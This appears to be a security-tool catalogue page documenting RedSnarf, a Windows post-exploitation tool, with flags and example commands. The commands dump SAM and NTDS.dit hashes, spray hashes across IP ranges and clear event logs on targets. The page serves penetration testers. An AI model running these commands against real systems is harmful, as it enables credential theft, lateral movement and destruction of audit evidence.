Post Exploitationwindowscredentialshashespentestingredteaminglsasampass-the-hash

RedSnarf

Pentesting tool for retrieving credentials from Windows workstations, servers, and domain controllers using OpSec safe techniques. Supports hash retrieval, credential enumeration, pass-the-hash, and hash spraying.

Description

RedSnarf is a pentesting and redteaming tool developed by Ed Williams for extracting hashes and credentials from Windows systems. It targets local SAM hashes, users with elevated privileges and their LSA secrets, MS cached credentials, and enables pass-the-hash attacks. The tool also identifies weak username/password combinations like administrator/Password01 and supports retrieving hashes across ranges with hash spraying capabilities.

Use cases include post-exploitation scenarios on workstations, servers, and domain controllers where authenticated access is obtained. It aids in credential dumping without triggering obvious alerts through OpSec safe methods. Additional utilities cover enumeration, registry manipulation, and integration with other tools like creddump7.

RedSnarf Version 0.5p provides a rich feature set for pentesting, including hash extraction via drsuapi or NTDSUtil, service account enumeration, and various credential validation options.

How It Works

RedSnarf authenticates to Windows targets using provided credentials or hashes via SMB protocols and Impacket libraries. It extracts local SAM hashes, LSA secrets from elevated users, and cached domain credentials. For domain controllers, it uses methods like DRSUAPI or NTDSUtil to dump NTDS.dit. Pass-the-hash leverages NTLM hashes for lateral movement, while hash spraying tests multiple hashes across ranges. Enumeration queries LDAP, services, and registry keys; utilities execute PowerShell, clear logs, or deploy shells OpSec-safely.

Installation

bash

sudo apt install redsnarf

Flags

-H, --host HOSTSpecify a hostname -H ip= / range -H range= / targets file -H file= to grab hashes from

-u, --username USERNAMEEnter a username

-p, --password PASSWORDEnter a password or hash

-d, --domain_name DOMAIN_NAME<Optional> Enter domain name

-cC, --credpath CREDPATH<Optional> Enter path to creddump7 default /usr/share/creddump7/

-cM, --mergepf MERGEPF<Optional> Enter output path and filename to merge multiple pwdump files default /tmp/merged.txt

-cO, --outputpath OUTPUTPATH<Optional> Enter output path default /tmp/

-cQ, --quick_validate QUICK_VALIDATE<Optional> Quickly Validate Credentials

-uA, --auto_complete AUTO_COMPLETE<Optional> Copy autocomplete file to /etc/bash_completion.d

-uC, --clear_event CLEAR_EVENT<Optional> Clear event log - application, security, setup or system

-hI, --drsuapi DRSUAPI<Optional> Extract NTDS.dit hashes using drsuapi method - accepts machine name as username

-hN, --ntds_util NTDS_UTIL<Optional> Extract NTDS.dit using NTDSUtil

-eA, --service_accounts SERVICE_ACCOUNTS<Optional> Enum service accounts, if any

Examples

Show the help message and usage information

redsnarf -h

Retrieve hashes from a single host using provided credentials

./redsnarf -H ip=192.168.0.1 -u administrator -p Password1

Grab hashes from an IP range

redsnarf -H range=192.168.0.0/24 -u administrator -p Password1

Grab hashes from a targets file

redsnarf -H file=targets.txt -u administrator -p Password1

Quickly validate credentials on a host

redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -cQ

Extract NTDS.dit hashes using DRSUAPI method

redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -hI

Clear event logs on the target

redsnarf -H ip=192.168.0.1 -u administrator -p Password1 -uC

Updated 2026-04-16kali.org ↗